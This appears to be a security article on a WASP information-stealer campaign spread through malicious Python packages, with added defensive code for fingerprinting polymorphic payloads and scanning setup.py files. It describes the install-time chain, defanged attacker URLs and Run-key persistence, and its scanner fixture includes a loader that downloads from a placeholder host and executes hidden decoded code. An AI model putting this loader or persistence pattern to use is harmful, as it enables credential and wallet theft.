
Steganography and polymorphism have long been used to obfuscate code in malware attacks, and many campaigns have reached their victims through these techniques. Legacy malware, too, has been reworked with steganography and polymorphism so that it can be served to victims in new attacks. Security researchers at Phylum and Check Point have reported a new version of the “WASP” malware, modified with steganography and polymorphism. The attack distributes malicious Python packages through the software supply chain, with the payload configured as an information stealer. The Checkmarx supply chain security research team tracks the actor behind these attacks as the threat actor “WASP.” The WASP malware has been circulating since 2015, but this iteration is designed to steal credentials, personal information and cryptocurrency, using steganography and polymorphism to evade detection. The malware is an information-stealing trojan that hides in malicious PyPI packages and on GitHub.
Anatomy of the WASP Stealer Malware
This time the legacy code has been manipulated so that its user can copy existing popular libraries and inject a malicious ‘import’ statement into them. The injected code infects the victim’s machine with a script that runs in the background. The script, which also fetches the victim’s geolocation, contains a modified version of an information stealer (WASP). The attackers have infected hundreds of victims to date and are still actively releasing new packages to continue the campaign. Steganography is used to hide the malicious code inside the packages. The payload is polymorphic: different code is returned each time the second- and third-stage URLs are loaded, which helps evade detection and supports persistence.
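The polymorphism described above defeats hash- and string-based signatures because every fetch yields a different file. The following added example (not code from this page or from the researchers it cites) shows why, on two constructed stage-2 variants that differ only in identifier names and a decoy string: their SHA-256 file hashes differ, while a fingerprint computed over the normalized AST (identifiers replaced by placeholders, constants reduced to their types, imported library names kept) is identical. The variant sources and the helper names `structural_fingerprint` and `_Normalizer` are assumptions of this example.

```python
import ast
import builtins
import hashlib

# Constructed samples (not real stage-2 code): two variants of the same
# decode-and-decompress logic, differing only in names and a decoy string.
VARIANT_A = '''
import base64, zlib
def qzx(a1):
    b2 = base64.b64decode(a1)
    return zlib.decompress(b2)
_junk = "m9X2kLp"
'''

VARIANT_B = '''
import base64, zlib
def rtv(n7):
    k3 = base64.b64decode(n7)
    return zlib.decompress(k3)
_junk = "Qa81zzT"
'''


def file_hash(src: str) -> str:
    """Conventional file hash: changes with every polymorphic rewrite."""
    return hashlib.sha256(src.encode()).hexdigest()


def _imported_names(tree: ast.AST) -> set[str]:
    """Names bound by import statements; they identify the libraries used
    and are the part of the code worth keeping in the fingerprint."""
    keep = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                keep.add((alias.asname or alias.name).split(".")[0])
        elif isinstance(node, ast.ImportFrom):
            for alias in node.names:
                keep.add(alias.asname or alias.name)
    return keep


class _Normalizer(ast.NodeTransformer):
    """Rename attacker-chosen identifiers to positional placeholders and
    replace constant values by their type, leaving structure and library
    calls (attribute names such as b64decode) untouched."""

    def __init__(self, keep: set[str]):
        self.keep = keep
        self.names: dict[str, str] = {}

    def _placeholder(self, name: str) -> str:
        if name in self.keep:
            return name
        return self.names.setdefault(name, f"v{len(self.names)}")

    def visit_Name(self, node: ast.Name) -> ast.AST:
        return ast.copy_location(
            ast.Name(id=self._placeholder(node.id), ctx=node.ctx), node)

    def visit_arg(self, node: ast.arg) -> ast.AST:
        node.arg = self._placeholder(node.arg)
        return node

    def visit_FunctionDef(self, node: ast.FunctionDef) -> ast.AST:
        node.name = self._placeholder(node.name)
        self.generic_visit(node)
        return node

    def visit_Constant(self, node: ast.Constant) -> ast.AST:
        # Keep only the constant's type so decoy strings and numbers do not matter.
        return ast.copy_location(
            ast.Constant(value=type(node.value).__name__), node)


def structural_fingerprint(src: str) -> str:
    """Hash of the normalized AST: stable across renaming and decoy changes."""
    tree = ast.parse(src)
    keep = _imported_names(tree) | set(dir(builtins))
    tree = _Normalizer(keep).visit(tree)
    canonical = ast.dump(tree, annotate_fields=False, include_attributes=False)
    return hashlib.sha256(canonical.encode()).hexdigest()


if __name__ == "__main__":
    print("file hashes equal:      ", file_hash(VARIANT_A) == file_hash(VARIANT_B))
    print("structural hashes equal:", structural_fingerprint(VARIANT_A) == structural_fingerprint(VARIANT_B))
```

A fingerprint of this kind is what a detection pipeline can pivot on when the second and third stages are re-generated per request; it is a triage aid, not a substitute for behavioural monitoring, since a rewriter that also changes control flow or builds library names dynamically will produce a different structure.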
The Code Level Actions by WASP Stealer
- After the package is installed, its setup.py script runs and installs additional Python packages. One of them is judyb, which provides steganography utilities.
- Next, the setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory.
- Then the setup.py script uses the “lsb.reveal” function from the freshly installed judyb package to extract hidden code from the downloaded image.
- Most of that data is base64-encoded. Once the malware decodes itself, the decrypted code carries out the code-level modification on the system.
- Once the code from the previous stage runs, it fetches another piece of code from the URL “hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4”.
- The returned code is polymorphic (as we’ll discuss in the next chapter) and highly obfuscated.
- The payload in this stage is gzip-encoded, so the first instruction executed decodes and loads it. Once that happens: (1) additional code from “hxxp://misogyny[.]wtf/grab/UsRjS959Rqm4sPG4” is fetched and stored as a file with a random name in the operating system’s temp directory; (2) the code modifies the registry key `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` so that the Python code persists across reboots.
- At this point the machine is infected and the persistent script runs in the background. This modified version of the WASP stealer then grabs all Discord accounts, passwords, crypto wallets, credit card details and any interesting files on the victim’s PC (the script also fetches the victim’s geolocation).
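A reviewer vetting a package before installation can look for the install-time pattern listed in the steps above. The following is an added example, not tooling from the page or from the researchers it cites: it parses a setup.py with Python’s ast module and flags the indicators named above (a steganography import, an lsb.reveal call, exec() wrapped around decoded data, a download staged in the temp directory, and a reference to the Run key). Both sample setup.py texts, the placeholder URL example.invalid and the helper names `scan_setup_py` and `_call_name` are constructed for this example; the samples are parsed, never executed.

```python
import ast
import re

# Constructed sample, not the campaign's code: a setup.py shaped like the loader
# the page describes. The URL is a placeholder; the text is only parsed, never run.
SUSPICIOUS_SETUP = r'''
import base64, os, tempfile, urllib.request
from judyb import lsb
from setuptools import setup

RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
img = os.path.join(tempfile.gettempdir(), "cover.png")
urllib.request.urlretrieve("http://example.invalid/cover.png", img)
exec(base64.b64decode(lsb.reveal(img)))
setup(name="totally-legit", version="0.1")
'''

# Constructed benign control with an ordinary setup() call.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="useful-lib", version="1.2.0", packages=find_packages())
'''

STEGO_MODULES = {"judyb"}  # the steganography package named on the page; extend as needed
EXEC_CALLS = {"exec", "eval"}
DECODER_CALLS = {"b64decode", "decompress", "unhexlify"}
NETWORK_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
TEMP_CALLS = {"tempfile.gettempdir", "tempfile.mkstemp", "tempfile.NamedTemporaryFile"}
# Matches the key whether written with one backslash (raw string) or two (escaped).
RUN_KEY_RE = re.compile(r"CurrentVersion\\+Run", re.IGNORECASE)


def _call_name(node: ast.Call) -> str:
    """Dotted callee name, e.g. 'lsb.reveal', 'urllib.request.urlretrieve' or 'exec'."""
    parts = []
    cur = node.func
    while isinstance(cur, ast.Attribute):
        parts.append(cur.attr)
        cur = cur.value
    if isinstance(cur, ast.Name):
        parts.append(cur.id)
    return ".".join(reversed(parts))


def scan_setup_py(src: str) -> list[str]:
    """Return sorted, human-readable findings for the install-time indicators
    described on the page; an empty list means none were seen."""
    findings = set()
    tree = ast.parse(src)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in STEGO_MODULES:
                    findings.add(f"imports steganography module {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in STEGO_MODULES:
                findings.add(f"imports steganography module {node.module}")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            short = name.split(".")[-1]
            if short in EXEC_CALLS:
                # exec()/eval() wrapped around a decoder is the "decode then run" loader shape.
                inner = sorted(_call_name(n) for n in ast.walk(node)
                               if isinstance(n, ast.Call) and n is not node)
                if any(i.split(".")[-1] in DECODER_CALLS for i in inner):
                    findings.add(f"{short}() over decoded data: {', '.join(inner)}")
                else:
                    findings.add(f"dynamic code execution via {short}()")
            elif short == "reveal":
                findings.add(f"steganographic extraction call {name}()")
            elif name in NETWORK_CALLS:
                findings.add(f"downloads remote content via {name}()")
            elif name in TEMP_CALLS:
                findings.add(f"stages files in the temp directory via {name}()")
    if RUN_KEY_RE.search(src):
        findings.add("references the Run registry key (persistence)")
    return sorted(findings)


if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, "->", scan_setup_py(text) or "no findings")
```

Run this over the setup.py of every package a build pulls in (for example as a pre-install hook or in CI) and treat two or more findings as grounds for manual review. The AST matching is deliberately simple: names built with getattr() or string concatenation, or a loader split across helper modules, will not be caught, so the scan is a first triage filter rather than a verdict.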
Conclusion
The perpetrator is reported to be selling copies of WASP for USD 20 to other criminals, paid in cryptocurrency or gift cards. The threat actor behind these attacks offers the malware on cybercrime forums, claiming the code is fully undetected. The simple but lethal technique of creating fake GitHub accounts and sharing poisoned snippets has tricked hundreds of users in this campaign. Since the campaign began, the attacker has created tens of new Python packages while mimicking legitimate libraries and accounts. WASP has also been manipulated to make it persistent, so detection is not easy.